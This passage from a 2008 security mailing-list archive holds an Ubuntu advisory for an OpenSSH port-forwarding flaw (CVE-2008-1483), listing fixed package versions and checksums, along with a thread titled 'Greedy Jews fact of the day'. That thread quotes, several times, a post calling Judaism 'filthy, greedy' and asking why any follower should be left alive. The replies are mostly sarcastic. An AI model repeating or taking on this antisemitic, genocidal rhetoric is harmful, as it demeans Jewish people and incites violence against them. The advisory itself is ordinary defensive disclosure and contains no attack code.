In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
	<29471.1207094777@turing-police.cc.vt.edu>
	<2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID: <200804011447.07910.prb@lava.net>

On Tuesday 01 April 2008 14:28:57 T Biehn wrote:
> Valdis,
> Never took you for a anti-Semite.

Maybe you haven't read enough of Valdis' posts. He knows a lot about security, 
but often writes with tongue firmly planted in cheek. There really isn't a 
better response to these kinds of rants.

> On Tue, Apr 1, 2008 at 8:06 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> >  > Why should we leave a single follower of such a filthy, greedy
> >  > religion alive? Do any of you have an idea?
> >
> >  You're just sore because they thought of the meme "All the riches
> > rightfully belong to those of our religion" before your religion did...
> >
> > _______________________________________________
> >  Full-Disclosure - We believe in it.
> >  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >  Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky


From kees at ubuntu.com  Wed Apr  2 01:46:52 2008
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 1 Apr 2008 17:46:52 -0700
Subject: [Full-disclosure] [USN-597-1] OpenSSH vulnerability
Message-ID: <20080402004652.GQ8254@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-597-1             April 01, 2008
openssh vulnerability
CVE-2008-1483
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  openssh-client                  1:4.2p1-7ubuntu3.3

Ubuntu 6.10:
  openssh-client                  1:4.3p2-5ubuntu1.2

Ubuntu 7.04:
  openssh-client                  1:4.3p2-8ubuntu1.2

Ubuntu 7.10:
  openssh-client                  1:4.6p1-5ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Timo Juhani Lindfors discovered that the OpenSSH client, when port
forwarding was requested, would listen on any available address family.
A local attacker could exploit this flaw on systems with IPv6 enabled
to hijack connections, including X11 forwards.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1-7ubuntu3.3.diff.gz
      Size/MD5:   171837 216f11e247dfeb681cd75c033cc2fc5c
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1-7ubuntu3.3.dsc
      Size/MD5:     1003 3902e4c29bba7ee62b48c9641bd0bc76
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1.orig.tar.gz
      Size/MD5:   928420 93295701e6bcd76fabd6a271654ed15c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.2p1-7ubuntu3.3_all.deb
      Size/MD5:     1052 5e47eabdf3306595bef55704b3d80702

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_amd64.udeb
      Size/MD5:   165878 c18cc9d5cbf4f83e9e7730a43c18dba6
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_amd64.deb
      Size/MD5:   610832 5479cad40052592557e93b64536a45c6
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_amd64.deb
      Size/MD5:   236222 4d98f6e82ae9d26e73d12ec2e429dd14
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_amd64.deb
      Size/MD5:    87126 9e041ad9534dc99cb01aa6261acf071f
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_amd64.udeb
      Size/MD5:   182086 7b52e535986415799f89b04ea95df8ae

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_i386.udeb
      Size/MD5:   140116 99bac142d2bfd0d1bdd61ce8a6a917fc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_i386.deb
      Size/MD5:   537108 c828718a152abc20cd547c39653ec67b
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_i386.deb
      Size/MD5:   205484 c495cf9d7d25e95b9d9baa9a873ccfca
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_i386.deb
      Size/MD5:    86768 a3a6c7aa8840720498b811b5a0b814b5
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_i386.udeb
      Size/MD5:   151548 c657878eb1b8a91897925914aab0bab8

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_powerpc.udeb
      Size/MD5:   158552 4aada820956ab80eb424713956347551
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_powerpc.deb
      Size/MD5:   594088 26dbbb6ff0359f11dfe280f06d9ebaf0
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_powerpc.deb
      Size/MD5:   226268 8916980ee9d4ef41b77a89ca56f891d9
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_powerpc.deb
      Size/MD5:    88420 dca6aabe6e164cd90e2b35cffe934a14
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_powerpc.udeb
      Size/MD5:   165904 e6e6f51d1c67732ed9dbc7fad4669ef0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.3_sparc.udeb
      Size/MD5:   149268 6a92b75179eea1972b082892bd8750de
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.3_sparc.deb
      Size/MD5:   543862 be125ef3611c0aa2f2e5ed0f8c36a250
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.3_sparc.deb
      Size/MD5:   208864 9f9c4e3b1ec44ccda77a00e674f200be
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.3_sparc.deb
      Size/MD5:    86794 1e6fceb45f5732053ab06be561b089b3
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.3_sparc.udeb
      Size/MD5:   160702 b5195d1a74c787b35a7517b0c53ba63b

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-5ubuntu1.2.diff.gz
      Size/MD5:   168042 5672e4c18795bbedbe025d80cee170c0
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-5ubuntu1.2.dsc
      Size/MD5:     1008 22075bd89d5030cd40e3eddf56b51958
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
      Size/MD5:   920186 239fc801443acaffd4c1f111948ee69c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.3p2-5ubuntu1.2_all.deb
      Size/MD5:     1100 61ffbef59843a549f742da88c456e309

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_amd64.udeb
      Size/MD5:   171956 12d9cc34858461aec2af702a80455e84
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_amd64.deb
      Size/MD5:   662860 c94742bbd1fc245961c1457c28d4a620
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_amd64.deb
      Size/MD5:   240798 c5710561e171555dc9d51407b91f67c8
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_amd64.deb
      Size/MD5:   100026 88915b91b746ae83ae6446fad2097159
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_amd64.udeb
      Size/MD5:   183810 bebfe8b9c8c214943ea34f57b4be0e73

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_i386.udeb
      Size/MD5:   155430 ba07c6d05c5b2fcfab23525ab1d2a9e2
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_i386.deb
      Size/MD5:   612374 cec1d2eb7071bd77af0f97bdd1e87127
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_i386.deb
      Size/MD5:   217444 ac4a4ea32498fcfb85555ef7eed06f47
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_i386.deb
      Size/MD5:    99750 c393d03129303dacabe615941a236d70
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_i386.udeb
      Size/MD5:   162594 c0bfed177f9ada9861e499ebb763d79d

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_powerpc.udeb
      Size/MD5:   169730 224851fea13b7c3710fc8995772f0a45
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_powerpc.deb
      Size/MD5:   651210 181d78aa90afc797f6e6a513c4e9d2b5
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_powerpc.deb
      Size/MD5:   232302 16847acac5b087337bb02cf4d4fd57ef
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_powerpc.deb
      Size/MD5:   101312 c95917858fdc4fe937e6ab63e17973c3
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_powerpc.udeb
      Size/MD5:   172480 7228dc84886c03652e50a2b84745224b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-5ubuntu1.2_sparc.udeb
      Size/MD5:   160058 0d9ad412a2e50a4f62c950c111419887
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-5ubuntu1.2_sparc.deb
      Size/MD5:   599452 ee374a2e26423cc41422b4cea24ebb75
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-5ubuntu1.2_sparc.deb
      Size/MD5:   214388 7e470015f5705e7c866692c08364dfa4
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-5ubuntu1.2_sparc.deb
      Size/MD5:    99704 7eca83add879793d979af67d9a287425
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.3p2-5ubuntu1.2_sparc.udeb
      Size/MD5:   166838 6115b3e0baa6e32b851cbfe8f21b99af

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-8ubuntu1.2.diff.gz
      Size/MD5:   265384 fed3e4874f40b6475edd015b654693ca
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2-8ubuntu1.2.dsc
      Size/MD5:     1074 cd1a6520c1dca6eb6f9479d3c6c81cea
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
      Size/MD5:   920186 239fc801443acaffd4c1f111948ee69c

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.3p2-8ubuntu1.2_all.deb
      Size/MD5:     1084 c66f25a64619593a467260c38d3113d9
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.3p2-8ubuntu1.2_all.deb
      Size/MD5:    93068 221e4a1b96fc9a5be476f6095c65b35c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_amd64.udeb
      Size/MD5:   172486 111d3628f5c3a7d9b7e1bb04438a4093
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_amd64.deb
      Size/MD5:   691282 7094027a354d92154f4193f67fe88201
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_amd64.udeb
      Size/MD5:   184488 5beea05c07e0a614dbcbb8ea663853bb
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_amd64.deb
      Size/MD5:   254096 2f8686e2da6b7a55864f809a46c1be02
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_amd64.deb
      Size/MD5:   101438 bf59a63f2fb039d23582db8907b5978f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_i386.udeb
      Size/MD5:   155802 9e64db938cc7eb701ae541b90c1f76ce
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_i386.deb
      Size/MD5:   654874 770a9632542f4456ce57db9ccefef8dc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_i386.udeb
      Size/MD5:   162994 907b641a56f0330eba2099ce3a8fc543
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_i386.deb
      Size/MD5:   236022 e9ae72242b33aef00ea801dd7e8f447b
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_i386.deb
      Size/MD5:   101150 613d2dd5213af02a3bc081234422e795

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_powerpc.udeb
      Size/MD5:   177386 b58f7bc4b63e86c2347c7f69a247d2b2
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_powerpc.deb
      Size/MD5:   712516 47a0be3beb6f0aaa616d4cee568c3a72
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_powerpc.udeb
      Size/MD5:   180834 447c4a8e80fd7255c2d0c9448fd19d6b
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_powerpc.deb
      Size/MD5:   257010 c1c5731be72a82f93b7ed3215e432d0f
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_powerpc.deb
      Size/MD5:   103906 3133a245c90ab9edc08c425d2d4b4a5e

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.3p2-8ubuntu1.2_sparc.udeb
      Size/MD5:   163268 1bbf94e36877e3a36624746c3f895858
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.3p2-8ubuntu1.2_sparc.deb
      Size/MD5:   702316 30a773daf182c4d156922fa3e61a0826
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.3p2-8ubuntu1.2_sparc.udeb
      Size/MD5:   170356 c8647ecc728d77aaadc29395396e93db
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.3p2-8ubuntu1.2_sparc.deb
      Size/MD5:   261142 b1f4e31c6f0882f2973f7e81c47a0385
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.3p2-8ubuntu1.2_sparc.deb
      Size/MD5:   101390 a91dc46eb0726f06133717df9d054e80

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1-5ubuntu0.2.diff.gz
      Size/MD5:   188249 4a5cfad0640d13b665ecdf7fc2685ee3
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1-5ubuntu0.2.dsc
      Size/MD5:     1169 47fc3f0e3cfc6e5ae9f11948fd287165
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.6p1.orig.tar.gz
      Size/MD5:   946439 cee58cd226138191561fa2d484e18f49

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.6p1-5ubuntu0.2_all.deb
      Size/MD5:     1094 7ebb9c93e0ce5e2abd99e53df6447741
    http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/ssh-krb5_4.6p1-5ubuntu0.2_all.deb
      Size/MD5:    80244 de8bc5959a6a5962d3c9d646bba5c7bb

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_amd64.udeb
      Size/MD5:   175878 b11a5712beef7547615dcba520d2e323
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_amd64.deb
      Size/MD5:   696454 a3d8d59c019a494cc821fb1169940674
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_amd64.udeb
      Size/MD5:   191976 cef956003caa9ae201e49b687afabd75
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_amd64.deb
      Size/MD5:   266714 2fa98d4f7910ed6eb6e5c01c3d9fdc67
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_amd64.deb
      Size/MD5:    88382 ec70425a10aa35781175b19422c06ec5

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_i386.udeb
      Size/MD5:   158194 0cfdf097b212a881220b920273f6c37a
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_i386.deb
      Size/MD5:   656828 bf563187fbbd6eb6bd08467f522a4749
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_i386.udeb
      Size/MD5:   169028 d44cd4a31b1a8e879e2a44220847a246
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_i386.deb
      Size/MD5:   247578 e91b2014ac012f6276746390ee68b584
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_i386.deb
      Size/MD5:    88032 95ad2c683cf079ebf1e2207bef66a876

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_powerpc.udeb
      Size/MD5:   180234 5e3cd63862b4659de83de44299d1e153
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_powerpc.deb
      Size/MD5:   717230 14e30fed3d0dade9bd851df3b125cf0e
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_powerpc.udeb
      Size/MD5:   187310 f23b8a5fa0b602f21ec230c8ebc442a7
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_powerpc.deb
      Size/MD5:   269624 3d2cd008a087d3deecb7d65e54517f01
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_powerpc.deb
      Size/MD5:    90756 43aa8a4cd34884f24e5c412d581e87cb

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.6p1-5ubuntu0.2_sparc.udeb
      Size/MD5:   166152 4bb1de1ee32945c51f492e95aa47b350
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.6p1-5ubuntu0.2_sparc.deb
      Size/MD5:   707646 a97dd22b1a8181239b4483689f876430
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server-udeb_4.6p1-5ubuntu0.2_sparc.udeb
      Size/MD5:   176762 0eff3109cf41ece689470902599e8e4a
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.6p1-5ubuntu0.2_sparc.deb
      Size/MD5:   274528 978fecd7269599ea851d972ef3b3d6a6
    http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.6p1-5ubuntu0.2_sparc.deb
      Size/MD5:    88352 b60a65f9604f90c7618ebd1a565ae5e2

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/91b845e1/attachment.bin 

From infolookup at gmail.com  Wed Apr  2 02:48:13 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Wed, 2 Apr 2008 01:48:13 +0000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com><29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2112875235-1207100888-cardhu_decombobulator_blackberry.rim.net-959436740-@bxe139.bisx.prod.on.blackberry>

Both Jews and Gentiles that's what the word says.
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: Valdis.Kletnieks at vt.edu

Date: Tue, 01 Apr 2008 20:06:17 
To:Andrew A <gluttony at gmail.com>
Cc:Full Disclosure <full-disclosure at lists.grok.org.uk>
Subject: Re: [Full-disclosure] Greedy Jews fact of the day


On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:

> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From winsoc at google